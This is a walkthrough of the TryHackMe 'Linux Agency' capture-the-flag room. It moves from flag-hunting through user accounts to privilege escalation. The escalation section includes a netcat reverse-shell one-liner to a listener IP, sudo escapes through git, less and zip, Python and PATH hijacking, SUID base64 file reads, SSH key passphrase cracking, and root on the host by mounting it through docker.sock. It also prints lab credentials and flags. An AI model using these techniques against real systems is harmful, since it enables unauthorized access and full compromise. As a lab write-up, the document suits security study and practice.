# TryHackMe-Linux Agency First we are told to ssh into the box using the creds username:agent47 password:640509040147

## Linux Fundamentals ### Mission 1 Flag As from the ssh banner we got the flag for mission 1 ### Mission 2 Flag Use the previous flag to login to `mission1` user

In mission1's home directory you will find the flag for mission2 and you can the login with it to next user or in this case next mission

### Mission 3 flag

Going to mission'2 home directory you will see `flag.txt` which holds flag for this mission

### Mission 4 flag Switch user to mission3 with the previous flag found

It seems there is no flag in the text file this time so we need to search around for the flag Running `grep -rnw /home -e 'mission4'` I saw end of the flag in the same message

Opening it with `vi` editor I found the flag

### Mission 5 flag Switch user to mission4 with the flag found

Head over to mission's 5 home directory

And you'll find flag for the next mission ### Mission 6 flag

### Mission 7 flag

This was quite easy because all we have to do is `ls -la` ### Mission 8 flag Using the previous flag switch to mission7 user

### Mission 9 flag

There was no flag in the home directory let's see if we can find anything in root directory (/)

### Mission 10 flag

We only see `rockyou.txt` Doing a grep for `mission10` you will find your flag

### Mission 11 flag

We see a bunch of directories in mission10's home directory so we have to look for mission11 string in these directories

### Mission 12 flag

Reading `.bashrc`

### Mission 13 flag

`flag.txt` is in home directory of mission13 but it doesn't have any permission so use chmod to change permissions

### Mission 14 flag

### Mission 15 flag

This is looking like stream of binary so let's hop over to cyberchef

### Mission 16 flag

This representation looks like hex because of `D` in the string

### Mission 17 flag

Here we have a `flag` binary but doesn't have any permissions so set execute flag on the binary

### Mission 18 flag

It seems we have an ecnrypted string and which is being decrpyted so we need to run the java file to get the flag

### Mission 19 flag

Here we have the same scenario but it is written in `ruby` language

### Mission 20 flag

Again same thing we need to compile the c program and run it

### Mission 21 flag

### Mission 22 flag

Again the flag is hidden in `.bashrc` ### Mission 23 flag

We get spawn into a python interactive shell

### Mission 24 flag

We get a message from text file but I didn't get it until I saw `/etc/hosts`

Where localhost was resolving into `mission24.com` which tells that there is a webpage

### Mission 25 flag

Here `bribe` is a binary file so on running

Transfer the binary to your machine for analyzing

Right in the beginning we can it's storing an evniromental variable in a variable named `_s1` and it's checking if it contains the string "money" so we just have to export a variable named pocket with value money in terminal

### Mission 26 flag

This tells me that there is something wrong with the PATH so let's export the PATH

### Mission 27 flag

Running the `strings` command on the jpg file we will get our flag

### Mission 28 flag

Extract the archive (gzip) file I have transfered it to my machine

Then use hexeditor to view the content in the jpg file which is acutally a gif image file

### Mission 29 flag

This `irb` is a ruby prompt

### Mission 30 flag

### Vikto's Flag

viktor{b52c60124c0f8f85fe647021122b3d9a} ## Privilege Escalation ### What is dalia's flag?

We can see a cronjob in which script is running as user `dalia` But when we try to overwrite the content of the `47.sh` script it will not be executed because it is being paused with sleep 30 which wil pause the execution for 30 seconds and at the same the the same script will be overwritten as a root user and then the ownership will be changed to `viktor` so we need to somehow prevent the `sleep` command so we exploit PATH variable and replace the sleep command with anything

Here as you can see I made a sleep file in which I just added a `bash` command which will not spawn a shell but will overwrite the actual sleep command Added PATH variable for that file

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.54.209 1234 >/tmp/f Add a netcat reverse shell

And boom we get a shell as user `dalia` ### What is silvio's flag? Doing `sudo -l`

We can see that this user can run `zip` as user `silvio`

silvio{657b4d058c03ab9988875bc937f9c2ef} ### What is reza's flag? Running `sudo -l` on this user

Now we will be able to escalate our privileges to rez through `git`

``` sudo -u reza PAGER='sh -c "exec sh 0<&1"' /usr/bin/git -p help ```

reza{2f1901644eda75306f3142d837b80d3e} ### What is jordan's flag?

Now this time we can run a python script as user `jordan`

On running we get an error because there is no python module named `shop`. What we can do is create a python module in the same directory where the script is and in it spawn a shell. ``` echo 'import os;os.system("/bin/bash")' > shop.py ``` But what is happening with SETENV is that it's setting the PYTHONPATH to default `SETENV: NOPASSWD: /opt/scripts/Gun-Shop.py` which will lead us to PYTHONPATH Hijacking

### What is ken's flag?

Here we can see less can be run as user `ken` so we can utilize to escalate our privileges

### What is sean's flag?

This one is pretty easy similar to less and this is one of the most common privilege escaltion we encounter in CTF's

Then just do `!/bin/sh`

But we don't see any flag here. Looking at the groups for sean we see that he belongs to `adm` which can look on system logs

### What is penelope's flag? Switch user to `penelope` with the password found in the logs which is base64 enccoded p3nelope

### What is maya's flag? Since that `base64` binary has an SUID so we can read any file by encoding it through base64 and then decoding it

### What is robert's Passphrase?

We see ssh keys , if your faimilar with ssh keys usually when we login with id_rsa it can sometimes be protected with a passpharse so let's transfer the private key to our machine and give it to ssh2john so we can get a hash and then crack it with johntheripper

And we found the passphrase!. industryweapon

### What is user.txt? Here it says about `entrypoint at localhost`

We can see 2 local ports that is intersting , we already saw port 80 now lets see what service is running on port 2222

SSH is running so we can try to login as `robert ` using the private key along with the passphrase

Checking for what robert can run as a superuser in docker environment

Since sudo version is 1.8.21 and we can see there is `!` in sudoers there is a CVE for this which is `CVE-2019-14287 `

### What is root.txt?

When we try to see what is the image name for docker conatainer we get a permission denied

To overcome this we need change permisisons of docker.sock which is used to communicate with the main docker daemon (process) by default. It is the entry point for a Docker API. This socket is used by Docker CLI by default to execute docker commands. Default location for the socket is `/run/docker.sock`

Now if we do `docker images`

We can see the name so now we can mount the host file system on the docker container

### Becoming root on the host machine Since we have mounted the host file system on the docker container and we are root we can pretty much do anything , for example if I modify sudoers file it will take effect on the actual host machine so what we can do is edit the maya user's premisison to let me execute anything